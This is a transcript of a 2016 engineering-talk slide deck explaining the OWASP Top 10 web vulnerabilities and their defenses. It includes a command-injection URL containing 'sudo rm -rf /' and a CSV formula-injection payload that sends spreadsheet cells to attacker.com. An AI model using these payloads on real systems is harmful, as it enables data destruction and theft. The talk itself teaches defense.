Let's talk Security

Let's talk Security

Slides from Engineering Talkies at Wingify

99a1c6a52cc56cc25cde65be5d54081a?s=128

Dheeraj Joshi

April 21, 2016
Tweet

Transcript

  1. Let’s talk Security Understanding, Exploiting and Defending against Top Web

    Vulnerabilities Dheeraj Joshi djadmin.in
  2. About Me I find security vulnerabilities for fun & swag

    and I wear White Hat. Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean, CloudFare, Intuit, Groupon, etc. What makes me happy?
  3. Security - Into The Details • Owasp’s Top 10 Vulnerabilities

    ◦ Explain ◦ Impact ◦ Defense ◦ Real examples (External + Internal) • Demo - RCE • Q & A
  4. Why should Startups Care about Security? Startups & SMEs are

    impromptu for cutting corners. One of the first things they cut is ‘Security'.
  5. None
  6. HACKER PUTS HOSTING SERVICE CODE SPACES OUT OF BUSINESS The

    Shutdown
  7. OWASP Top 10 And Beyond

  8. INJECTION

  9. PREVENT INJECTION • For databases use prepared statements • Whitelist

    inputs wherever possible • Sanitize inputs (use filter extension) • Don’t trust user input and always verify!
  10. Example Google Command Injection We can include any command in

    the URL below https://console.cloud.google.com/home/dashboard? project=;sudo rm -rf / Found by an Indian Security Researcher (S. Venkatesh)
  11. Exploiting ‘Export as CSV’ functionality Formula Injection =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click

    for further information") Fix - Append a single quote (‘) to the list of formula triggers ( =, +, -) If victim clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to attacker website, which may include other users’ sensitive information.
  12. BROKEN AUTHENTICATION AND SESSION MANAGEMENT

  13. MITIGATION • Enforce strong password policy • Require periodic reset

    of password • Use 2 factor authentication • Use SSL and secure flag on cookies • Don’t neglect failed-login detection & tracking • Only use httpOnly cookies
  14. CROSS SITE SCRIPTING - XSS • XSS attack users •

    “Javascript Injection” • Exploits can be bad, really bad..
  15. What is XSS? Typical Reflected XSS

  16. Stored XSS

  17. DOM XSS

  18. Protect Yourself • Use filter extension to filter inputs •

    Ensure that outputs are HTML encoded • Don’t reinvent the wheel • Don’t consider any part of the request as being “safe”
  19. ngBind attribute $sanitize - service in module ngSanitize Sanitizes an

    html string by stripping all potentially dangerous tokens.
  20. INSECURE DIRECT OBJECT REFERENCES

  21. Scenario / Exploit 1) First, an attacker signup for an

    account and request ”forgot password”. 2) You will receive a link : https://vimeo.com/forgot_password/[user id]/[token]
  22. Prevention • Low level access controls • Prevent user input

    in file/URL access commands • No unsanitized input to execution commands
  23. SECURITY MISCONFIGURATION

  24. PREVENTION > CURE • Perform periodic security checks using automated

    tools • Static Code Analysis • Example : Hardening MySQL, Directory Listing, Auth Tokens
  25. SENSITIVE DATA EXPOSURE • Exposed PHP error messages • Unencrypted

    sensitive data storage • Not using SSL • Example: a sensitive token should not be sent to external websites (Fitbit)
  26. MISSING FUNCTION LEVEL ACCESS CONTROL • Valid input processing without

    access controls • Decentralized access control layer • Example : Profile email address not validated (Github), S3 configuration
  27. • Don’t perform data changes on GET • Use secure

    (csrf) tokens for POST • Impact : Real bad, attack users • Example : Dropbox, CodeSchool CROSS-SITE REQUEST FORGERY (CSRF)
  28. • Not keeping libraries up-to-date • *cough*Wordpress*cough* • Example :

    Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE) USING COMPONENTS WITH KNOWN VULNERABILITIES
  29. UNVALIDATED REDIRECTS AND FORWARDS • Header Injection • JavaScript Parameter

    Injection • Reliance on HTTP_REFERER • Abuse window opener (Facebook)
  30. Example : Dropbox Open Redirect in v1 API

  31. Remote Code Execution

  32. The solution • Reset all passwords and keys • Remove

    backdoors (not easy) OR Destroy everything??
  33. Thank you References : • https://www.owasp.org • https://djadmin.in/pwn/ (tools)